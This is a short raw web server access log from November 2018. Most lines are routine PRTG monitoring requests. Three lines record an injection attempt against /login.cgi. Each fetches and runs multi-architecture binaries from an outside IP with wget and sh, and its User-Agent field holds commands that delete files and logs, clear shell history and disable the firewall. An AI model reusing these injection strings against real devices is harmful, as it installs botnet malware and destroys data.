79.103.126.31 - - [01/Nov/2018:21:17:54 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
79.107.251.147 - - [01/Nov/2018:21:17:57 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:21:18:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:19:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:20:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:21:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:22:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:23:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.44.63.253 - - [01/Nov/2018:21:24:07 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:21:24:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:25:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
